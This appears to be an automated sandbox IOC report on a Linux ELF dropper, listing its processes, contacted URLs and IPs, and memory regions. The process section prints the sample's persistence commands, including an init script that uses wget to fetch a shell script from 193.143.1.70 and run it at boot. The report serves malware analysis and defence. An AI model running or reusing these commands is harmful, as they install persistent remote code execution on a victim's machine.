Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/tmp/x86_32.nn.elf

/bin/sh

sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/x86_32.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/mybinary

/tmp/x86_32.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary

/tmp/x86_32.nn.elf

/bin/sh

sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"

/tmp/x86_32.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/sh

/tmp/x86_32.nn.elf

/bin/sh

sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/x86_32.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/sh /etc/rc.d/S99sh

/tmp/x86_32.nn.elf

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

There are 38 hidden processes, click here to show them.

URLs

Name

Malicious

http://193.143.1.70/curl.sh

unknown

Details

Name:	http://193.143.1.70/curl.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/x86_32.nn.elf
Source:	x86_32.nn.elf

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://193.143.1.70/lol.sh

unknown

Details

Name:	http://193.143.1.70/lol.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/x86_32.nn.elf
Source:	x86_32.nn.elf

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://193.143.1.70/

unknown

Details

Name:	http://193.143.1.70/
TargetID:	-1
From Memory:	true
Source:	x86_32.nn.elf, profile.12.dr, sh.36.dr, inittab.12.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.dr

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

Domains

Name

Malicious

daisy.ubuntu.com

162.213.35.25

IPs

Domain

Country

Malicious

218.167.205.10

unknown

Taiwan; Republic of China (ROC)

31.203.67.97

unknown

Kuwait

130.57.65.117

unknown

United States

215.216.145.15

unknown

United States

90.221.200.156

unknown

United Kingdom

155.30.181.9

unknown

United States

201.29.64.181

unknown

Brazil

179.174.184.1

unknown

Brazil

68.179.184.186

unknown

United States

3.178.142.197

unknown

United States

5.192.51.248

unknown

United Arab Emirates

62.4.202.180

unknown

Belgium

159.62.238.22

unknown

United States

182.162.142.167

unknown

Korea Republic of

91.93.8.125

unknown

Turkey

105.88.170.255

unknown

Egypt

211.179.87.167

unknown

Korea Republic of

97.221.241.92

unknown

United States

38.99.107.236

unknown

United States

85.71.211.237

unknown

Czech Republic

160.99.48.18

unknown

Serbia

113.19.29.142

unknown

India

92.150.250.102

unknown

France

116.168.106.88

unknown

China

198.155.165.198

unknown

United States

115.255.213.248

unknown

India

217.197.51.13

unknown

Sweden

29.88.103.55

unknown

United States

212.0.6.87

unknown

European Union

18.233.102.229

unknown

United States

121.223.212.111

unknown

Australia

211.255.68.200

unknown

Korea Republic of

175.188.25.235

unknown

China

38.37.191.255

unknown

United States

196.149.233.3

unknown

Egypt

42.194.3.87

unknown

China

218.147.193.107

unknown

Korea Republic of

137.225.74.198

unknown

United States

89.51.176.90

unknown

Germany

61.160.164.205

unknown

China

102.168.241.99

unknown

Tunisia

173.168.153.190

unknown

United States

31.185.240.58

unknown

United Kingdom

34.206.30.101

unknown

United States

4.81.241.116

unknown

United States

86.38.65.119

unknown

Lithuania

184.126.121.54

unknown

United States

142.76.161.17

unknown

Canada

193.143.1.59

unknown

178.125.26.230

unknown

Belarus

62.183.76.116

unknown

Russian Federation

49.232.30.45

unknown

China

27.62.142.251

unknown

India

129.37.27.91

unknown

United States

115.124.175.191

unknown

Japan

87.206.223.171

unknown

Poland

44.75.14.147

unknown

United States

203.1.133.138

unknown

Australia

53.131.133.38

unknown

Germany

122.200.36.8

unknown

Japan

180.192.168.110

unknown

Philippines

125.86.198.164

unknown

China

193.50.76.10

unknown

France

118.151.1.235

unknown

Japan

137.200.21.77

unknown

United States

151.163.178.218

unknown

United States

91.163.222.120

unknown

France

12.231.62.123

unknown

United States

114.104.243.172

unknown

China

43.167.61.169

unknown

Japan

164.238.82.124

unknown

United States

75.179.249.140

unknown

United States

29.49.80.161

unknown

United States

52.42.114.180

unknown

United States

89.110.39.141

unknown

Russian Federation

35.59.23.51

unknown

United States

35.127.189.72

unknown

United States

4.104.107.235

unknown

United States

111.101.235.157

unknown

Japan

28.122.92.213

unknown

United States

187.235.126.115

unknown

Mexico

204.6.189.12

unknown

United States

183.193.199.185

unknown

China

137.55.40.26

unknown

Netherlands

129.97.214.127

unknown

Canada

71.171.182.3

unknown

United States

117.38.57.225

unknown

China

112.159.228.6

unknown

Korea Republic of

23.113.239.93

unknown

United States

64.86.143.165

unknown

United States

208.227.2.187

unknown

United States

207.189.137.239

unknown

United States

114.131.213.110

unknown

Thailand

186.151.12.120

unknown

Guatemala

39.225.50.57

unknown

Indonesia

157.77.160.127

unknown

Japan

164.72.164.36

unknown

United States

20.22.8.77

unknown

United States

206.220.226.12

unknown

United States

113.37.226.50

unknown

Japan

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

805f000

page execute read

805f000

page execute read

f7fda000

page execute read

81bf000

page read and write

ff8a1000

page read and write

ff8a1000

page read and write

81bf000

page read and write

81c4000

page read and write

f7fda000

page execute read

8060000

page read and write

8060000

page read and write

8062000

page read and write

8062000

page read and write

There are 3 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
x86_32.nn.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportx86_32.nn.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
x86_32.nn.elf